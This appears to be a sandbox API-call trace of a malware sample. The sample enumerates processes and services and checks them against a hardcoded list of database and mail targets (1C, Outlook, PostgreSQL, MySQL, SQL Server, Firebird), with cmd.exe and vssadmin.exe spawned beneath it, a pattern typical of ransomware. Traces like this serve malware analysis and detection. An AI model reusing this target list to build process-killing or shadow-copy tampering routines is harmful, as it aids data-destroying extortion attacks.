	[0037.635] Process32FirstW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0037.635] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0037.635] lstrlenW (lpString="System") returned 6
	[0037.635] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0037.635] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0037.635] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0037.636] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0037.636] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0037.636] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0037.636] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0037.636] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0037.636] lstrlenW (lpString="smss.exe") returned 8
	[0037.636] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0037.636] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0037.636] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0037.636] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0037.636] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0037.636] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0037.636] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0037.636] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0037.637] lstrlenW (lpString="csrss.exe") returned 9
	[0037.637] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0037.637] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0037.637] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0037.637] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0037.637] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0037.637] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0037.637] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0037.637] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0037.637] lstrlenW (lpString="wininit.exe") returned 11
	[0037.637] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0037.637] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0037.637] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0037.637] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0037.637] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0037.638] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0037.638] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0037.638] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0037.638] lstrlenW (lpString="csrss.exe") returned 9
	[0037.638] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0037.638] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0037.639] lstrlenW (lpString="winlogon.exe") returned 12
	[0037.639] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0037.639] lstrlenW (lpString="services.exe") returned 12
	[0037.639] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0037.639] lstrlenW (lpString="lsass.exe") returned 9
	[0037.640] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0037.640] lstrlenW (lpString="lsm.exe") returned 7
	[0037.640] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0037.640] lstrlenW (lpString="svchost.exe") returned 11
	[0037.640] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0037.641] lstrlenW (lpString="svchost.exe") returned 11
	[0037.641] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0037.641] lstrlenW (lpString="svchost.exe") returned 11
	[0037.641] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0037.642] lstrlenW (lpString="svchost.exe") returned 11
	[0037.642] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0037.642] lstrlenW (lpString="svchost.exe") returned 11
	[0037.642] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0037.643] lstrlenW (lpString="audiodg.exe") returned 11
	[0037.643] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0037.643] lstrlenW (lpString="svchost.exe") returned 11
	[0037.643] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0037.644] lstrlenW (lpString="svchost.exe") returned 11
	[0037.644] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0037.644] lstrlenW (lpString="dwm.exe") returned 7
	[0037.644] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0037.645] lstrlenW (lpString="explorer.exe") returned 12
	[0037.645] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0037.645] lstrlenW (lpString="spoolsv.exe") returned 11
	[0037.645] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0037.645] lstrlenW (lpString="taskhost.exe") returned 12
	[0037.646] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0037.646] lstrlenW (lpString="svchost.exe") returned 11
	[0037.646] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0037.646] lstrlenW (lpString="taskeng.exe") returned 11
	[0037.646] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0037.647] lstrlenW (lpString="taskhost.exe") returned 12
	[0037.647] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="encoding hanging.exe")) returned 1
	[0037.647] lstrlenW (lpString="encoding hanging.exe") returned 20
	[0037.647] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="python tragedy.exe")) returned 1
	[0037.648] lstrlenW (lpString="python tragedy.exe") returned 18
	[0037.648] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="talent-mastercard.exe")) returned 1
	[0037.648] lstrlenW (lpString="talent-mastercard.exe") returned 21
	[0037.648] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="computers.exe")) returned 1
	[0037.649] lstrlenW (lpString="computers.exe") returned 13
	[0037.649] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="separated.exe")) returned 1
	[0037.649] lstrlenW (lpString="separated.exe") returned 13
	[0037.649] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="disks executives interval.exe")) returned 1
	[0037.650] lstrlenW (lpString="disks executives interval.exe") returned 29
	[0037.650] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="darkness.exe")) returned 1
	[0037.650] lstrlenW (lpString="darkness.exe") returned 12
	[0037.650] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="crafts-distinct.exe")) returned 1
	[0037.651] lstrlenW (lpString="crafts-distinct.exe") returned 19
	[0037.651] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sophisticated.exe")) returned 1
	[0037.651] lstrlenW (lpString="sophisticated.exe") returned 17
	[0037.651] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wishlist.exe")) returned 1
	[0037.651] lstrlenW (lpString="wishlist.exe") returned 12
	[0037.652] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="top.exe")) returned 1
	[0037.652] lstrlenW (lpString="top.exe") returned 7
	[0037.652] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="implemented.exe")) returned 1
	[0037.652] lstrlenW (lpString="implemented.exe") returned 15
	[0037.652] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="comp.exe")) returned 1
	[0037.653] lstrlenW (lpString="comp.exe") returned 8
	[0037.653] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="synthetic_memphis.exe")) returned 1
	[0037.653] lstrlenW (lpString="synthetic_memphis.exe") returned 21
	[0037.653] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solved.exe")) returned 1
	[0037.654] lstrlenW (lpString="solved.exe") returned 10
	[0037.654] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bosnia resolution.exe")) returned 1
	[0037.654] lstrlenW (lpString="bosnia resolution.exe") returned 21
	[0037.654] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trips.exe")) returned 1
	[0037.655] lstrlenW (lpString="trips.exe") returned 9
	[0037.655] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tumormanual.exe")) returned 1
	[0037.655] lstrlenW (lpString="tumormanual.exe") returned 15
	[0037.655] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x494, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="telecom.exe")) returned 1
	[0037.656] lstrlenW (lpString="telecom.exe") returned 11
	[0037.656] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="realistic.exe")) returned 1
	[0037.656] lstrlenW (lpString="realistic.exe") returned 13
	[0037.656] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0037.657] lstrlenW (lpString="WmiPrvSE.exe") returned 12
	[0037.657] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0037.657] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0037.657] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x934, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0037.658] lstrlenW (lpString="cmd.exe") returned 7
	[0037.658] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0037.658] lstrlenW (lpString="conhost.exe") returned 11
	[0037.658] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x948, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1
	[0037.658] lstrlenW (lpString="vssadmin.exe") returned 12
	[0037.659] Process32NextW (in: hSnapshot=0x1bc, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x948, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0
	[0037.659] CloseHandle (hObject=0x1bc) returned 1
	[0037.659] Sleep (dwMilliseconds=0x1f4) 
	[0038.477] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x7e0fb08
	[0038.477] EnumServicesStatusExW (in: hSCManager=0x7e0fb08, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 0
	[0038.478] GetLastError () returned 0xea
	[0038.478] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x123e) returned 0x7e5ca88
	[0038.478] EnumServicesStatusExW (in: hSCManager=0x7e0fb08, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x7e5ca88, cbBufSize=0x123e, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x7e5ca88, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 1
	[0038.478] CloseServiceHandle (hSCObject=0x7e0fb08) returned 1
	[0038.478] lstrlenW (lpString="Appinfo") returned 7
	[0038.478] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0038.478] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0038.478] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0038.478] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0038.478] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0038.479] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0038.479] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0038.479] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0038.479] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0038.479] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0038.479] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0038.479] lstrlenW (lpString="AudioSrv") returned 8
	[0038.479] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0038.479] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0038.479] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0038.479] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0038.479] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0038.479] lstrlenW (lpString="BFE") returned 3
	[0038.479] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0038.479] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0038.479] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0038.479] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0038.479] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0038.479] lstrlenW (lpString="CryptSvc") returned 8
	[0038.479] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0038.479] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0038.479] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0038.479] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0038.479] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0038.479] lstrlenW (lpString="CscService") returned 10
	[0038.479] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0038.479] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0038.479] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0038.479] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0038.479] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0038.479] lstrlenW (lpString="DcomLaunch") returned 10
	[0038.479] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0038.479] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0038.479] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0038.479] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0038.480] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0038.480] lstrlenW (lpString="Dhcp") returned 4
	[0038.480] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0038.480] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0038.480] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0038.480] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0038.480] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0038.480] lstrlenW (lpString="Dnscache") returned 8
	[0038.480] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
